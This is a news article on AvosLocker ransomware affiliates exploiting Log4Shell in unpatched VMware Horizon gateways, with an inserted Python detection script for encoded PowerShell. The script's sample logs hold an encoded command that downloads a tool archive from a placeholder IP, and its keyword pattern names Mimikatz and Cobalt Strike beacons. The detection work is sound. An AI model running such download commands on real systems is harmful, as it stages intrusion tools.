Ransomware Gang Uses Log4Shell
AvosLocker Makes Use of Unpatched VMware Virtual Desktop Software
Log4Shell is the vulnerability that keeps giving. Yet another ransomware group is at work exploiting a bug present in a ubiquitous open-source data-logging framework.
Analysis by Cisco Talos shows actors affiliated with the ransomware-as-a-service group AvosLocker exploiting unpatched VMware virtual desktop software that contains the vulnerability.
The Apache Software Foundation in December set off a global race between systems administrators and hackers when it fixed a bug identified by security researchers in the Java-based Log4j logging utility. Despite a flurry of warnings, some systems remain open to hackers exploiting unpatched systems.
A study of a campaign involving Avos ransomware showed the hackers had gained access to an unidentified organization via a pair of VMware Horizon applications (see: Log4Shell Update: VMware Horizon Targeted).
AvosLocker has been active since 2021 and follows a RaaS model - its operators handle negotiation and extortion practices for affiliates.
Typically, Avos actors use spam email campaigns as the initial infection vector to deploy ransomware. In this case, however, Cisco Talos found that they had entered through an internet-exposed ESXi server reached via a VMware Horizon Unified Access Gateway that was vulnerable to Log4Shell.
The customer whose network was attacked notified Talos on March 7, but the researchers observed activity going back to Feb. 7 and found four vulnerabilities associated with Log4Shell - CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832 - on the customer's network. These vulnerabilities could give a low-privilege, non-root user remote code execution on the Unified Access Gateway.
"Beyond that, the inner-transit firewalls that could control or limit the access to the internal infrastructure were not configured," they say. This gave the attackers initial access to the network and, from there, access to the internal servers.
The researchers also observed payloads and malicious tools on endpoints. The threat actors used "living off the land" binaries, meaning they used legitimate tools already present on the operating system for malicious purposes.
Once inside the network, the threat actors executed encoded PowerShell scripts on multiple occasions. The downloaded files included the open-source program Mimikatz, a .zip archive containing Cobalt Strike beacons and a port scanner labeled scanner.exe. Scanner.exe is a commercially available product, known as SoftPerfect Network Scanner, that Avos has used in the past.
After that, the attackers moved laterally in the network and delivered a payload.
"To proliferate the ransomware and other tools across the target network, the attackers used PDQ Deploy, a legitimate software deployment tool. Once the ransomware had been delivered, the victim's files were encrypted and a ransom note was displayed," the researchers say.
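The encoded PowerShell activity described above is something a defender can surface from process-creation logs. The following is an added detection sketch, not code from the Talos report: it decodes the base64 UTF-16LE argument that PowerShell's -EncodedCommand family of switches takes and flags download cmdlets or the tool names named in this article. The log lines, host names and URL are constructed for the example.

```python
import base64
import re

# PowerShell switches that take a base64 (UTF-16LE) encoded script.
ENC_FLAG = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Download cmdlets plus tool names this intrusion is reported to have used.
SUSPICIOUS = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|mimikatz|beacon|scanner\.exe", re.I)

def decode_encoded_command(token: str):
    """Decode a -EncodedCommand argument; PowerShell expects UTF-16LE base64."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64 / not valid UTF-16LE: still worth a look

def analyze_line(line: str):
    """Return a finding for a process-creation line, or None if no encoded command."""
    m = ENC_FLAG.search(line)
    if not m:
        return None
    decoded = decode_encoded_command(m.group(1))
    hits = sorted({h.lower() for h in SUSPICIOUS.findall(decoded or "")})
    severity = "high" if hits else ("medium" if decoded else "low")
    return {"decoded": decoded, "hits": hits, "severity": severity}

def scan(lines):
    """Run analyze_line over a log stream and keep only lines with findings."""
    return [(i, f) for i, line in enumerate(lines) if (f := analyze_line(line))]

def _enc(script: str) -> str:
    """Helper to build the constructed samples the way PowerShell would encode them."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample log lines (hypothetical hosts and a documentation-range IP).
SAMPLE_LOGS = [
    "host=UAG01 image=powershell.exe cmdline=powershell.exe -nop -w hidden -EncodedCommand "
    + _enc("(New-Object Net.WebClient).DownloadFile('http://198.51.100.7/tools.zip','C:\\Temp\\tools.zip')"),
    "host=UAG01 image=powershell.exe cmdline=powershell.exe -enc "
    + _enc("Start-Process C:\\Temp\\scanner.exe"),
    "host=WS02 image=powershell.exe cmdline=powershell.exe -NoProfile -Command Get-Service",
    # Valid base64 but an odd byte count, so it is not a real UTF-16LE script.
    "host=WS03 image=powershell.exe cmdline=powershell.exe -enc AAAAAAAAAAAAAAAAAAAAAAA=",
]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_LOGS):
        print(idx, finding["severity"], finding["hits"])
```

Lines without an encoded switch are ignored; a decodable script with no suspicious content is reported at medium so an analyst can still review it.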
Cisco's analysis comes on the heels of an advisory from the U.S. Cybersecurity and Infrastructure Security Agency and the Coast Guard Cyber Command detailing how multiple threat actors were exploiting Log4Shell on unpatched VMware products.
AvosLocker was also the subject of a joint advisory in March from the FBI, the U.S. Treasury Department and its Financial Crimes Enforcement Network bureau, warning that the group has targeted victims across multiple critical infrastructure sectors in the U.S., including financial services, critical manufacturing and government.
Because it is a RaaS operation, AvosLocker's indicators of compromise "vary between indicators specific to AvosLocker malware and indicators specific to the individual affiliate responsible for the intrusion," the advisory says.
AvosLocker ransomware encrypts files on a victim's server and renames them with the '.avos' extension, according to the advisory. "Depending upon the affiliate, payments in Monero are preferred; however, they accept Bitcoin for a 10%-25% premium."
AvosLocker victims sometimes receive phone calls from an AvosLocker representative, and in some cases, AvosLocker actors will threaten and execute distributed denial-of-service attacks during negotiations, the advisory says.